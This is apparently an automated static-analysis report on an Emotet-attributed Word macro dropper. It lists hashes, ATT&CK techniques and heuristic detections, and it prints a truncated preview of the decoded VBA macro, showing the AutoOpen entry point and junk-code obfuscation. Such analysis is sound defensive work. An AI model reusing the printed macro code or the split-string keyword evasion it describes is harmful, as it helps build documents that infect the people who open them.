Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 b1dced28edb0f204…

MALICIOUS

Office (OLE)

Size: 155.6 KB
Created: 2019-05-02 09:19:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 922dc8459d56833d2bdf2d6b565e7471
SHA-1: 043d9f8f9ba4e44679c055df0a63988ba5672886
SHA-256: b1dced28edb0f204dfeddacb104281bf43b041d6dfb17f063aed46e5b5437998
Risk Score: 302

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1047 Windows Management Instrumentation

The sample contains a VBA macro with an AutoOpen function, a common technique for Emotet. The macro utilizes obfuscation by splitting keywords and employs the GetObject and CreateObject methods to launch the Win32_Process WMI object. This indicates an intent to execute arbitrary code, likely to download and run a secondary payload.

Heuristics 8

  • ClamAV: Doc.Dropper.Emotet-6960223-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Emotet-6960223-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9201 bytes
SHA-256: c3183ded15217a12081707e16167b0c223d52a12137d99d343ab797271373468

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "vZQBAXDA"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "rBXBAw"
Attribute VB_Base = "0{DA881A5D-0836-41DC-AEB2-A125F0175BA1}{D4B0A26D-D51C-4919-BF00-92AD42DAA9D3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "mAwkQo_"

Attribute VB_Name = "VxZ4ZUDD"

Attribute VB_Name = "roA__U"

Attribute VB_Name = "PZUxGAA"
Attribute VB_Base = "0{CC7D7E51-64C9-4260-859B-37869BA4B74A}{22AA04A1-E257-4F6E-9D53-4273588B9F0D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "RAkQZCBw"
Function zAAcAAok(XXwBU_)
   Select Case wwAxBADX
Case sAxBAAQ = i1CUkZ = Sgn(550058908)
Case EAxUBZo = IkAACcZB
Case zAxB_AkA = Log(hZ1BcDAZ)
Case bcAwUAA = CBool(601425413)
Case uBUoADDG = 578024120
Case sB4AAB4D = CDate(ADUAxZQ)
End Select
   Select Case oUAAAU
Case l1AB_D = nwZ41AB = Sgn(797824526)
Case LAAAxDAw = iBDUoo
Case CAQA_GD = Log(PUAAAA)
Case Cc1ACkw = CBool(256259059)
Case KAAAAZ = 63024513
Case GA_ADA = CDate(bGoAAAw)
End Select
   Select Case fBAcAw
Case mCAo_Ax = WGAQ_QU = Sgn(899597438)
Case DUxAAG = DUCAB_
Case EQAZAZC = Log(FAAAxCD)
Case qAAwXX = CBool(186977685)
Case d_UkDZC_ = 151233042
Case KBAAAC = CDate(DAQBDA)
End Select
Set zAAcAAok = CVar(XXwBU_)
   Select Case zAA1DQoA
Case fcAcBoU = FAUDAoBA = Sgn(656225116)
Case iUckBU = P1kAAG
Case rDBQ1Q4k = Log(w1AwkwB)
Case KcAAoA_U = CBool(611319429)
Case YAAXxAA = 887026783
Case ooAAAGAA = CDate(uQcUGXwC)
End Select
   Select Case h4xA1AGc
Case swxwABA1 = jAAoAAAA = Sgn(301982635)
Case IBDDAADG = wZcoAZA
Case GAwXXw = Log(hAUAGA)
Case iCoAAAAA = CBool(361250033)
Case qxAGXQcQ = 923882045
Case ukCAUZx = CDate(IAXAQA)
End Select
   Select Case icQXD_
Case MBUQ1AD = wkA_1GBA = Sgn(243527934)
Case sZAAUAXA = EGo_oowk
Case KoBBAk4 = Log(LkBUAQ)
Case oABA4QB = CBool(877241998)
Case AUQACA = 171351521
Case wwGBBAAk = CDate(wkCAU_)
End Select
End Function
Sub autoopen()
   Select Case cBAoGQw
Case tAUo4cGx = IAA_4A = Sgn(196025023)
Case dDZABA4w = YDAAAA
Case PZAABAo = Log(mUAA_k1)
Case TxBBxQB = CBool(991855700)
Case lkA1AGoX = 272388466
Case XAA4BBAU = CDate(HBAAAA)
End Select
   Select Case XUAABQA
Case NwQQGA = qAZ1AD = Sgn(944438535)
Case jAAQ1ADQ = zQAUUUX
Case wDUUDDQ = Log(FxAD1A)
Case uZCCAcwA = CBool(68302783)
Case EDBwc_ = 100047039
Case KAAQAwGA = CDate(MoBUAUA)
End Select
Call iDAcAA_
   Select Case m_ABACU
Case ZkA_CXA = pAkAAA = Sgn(972134484)
Case K1k4QA1A = MAA_AQ
Case jAA41oC = Log(V1UABG)
Case cAoDAXA = CBool(87970600)
Case PAADoAGD = 811506297
Case zwGABoA = CDate(TwAcXk)
End Select
   Select Case zwcU4w
Case jAAAwAA4 = kAAwwXA = Sgn(187444709)
Case a4UAXUA = RQA1AD
Case MD__AU = Log(QAAcQ_)
Case jAxAZCBw = CBool(151680405)
Case FD4UkQkG = 90864516
Case nAZUokU1 = CDate(H44cAAB1)
End Select
   Select Case pBBX4BZ_
Case IcZXABQ = zAZBBU = Sgn(564969840)
Case SZoAAxok = cADQCUG
Case JCwAAAG = Log(AcQAAA)
Case nAw_ACA = CBool(160149357)
Case vABAXAXZ = 755378081
Case zBAZ4Dw = CDate(cAA4AUA)
End Select
End Sub

Attribute VB_Name = "iAA4QAAo"
Function iDAcAA_()
On Error Resume Next
   Select Case zGBA1Ao
Case tkBACZAA = FDDAD_ = Sgn(631693264)
Case CBXGkB_ = QCAcBC
Case PZAAAAGX = Log(vAwDAAU)
Case j_AAZA = CBool(264781617)
Case zkAkGBA = 139097869
Case uwZZ_xQ = CDate(w1cB4QUA)
End Select
   Select Case MUAQ_Bx
Case i_cDBA4A = tUAAwAX = Sgn(980031380)
Case rUQAAD1B = n1xcA1B
Case w_QAAA = Log(EBZAoBAk)
Case c_XZxAA4 = CBool(575324403)
Case NCGD
... (truncated)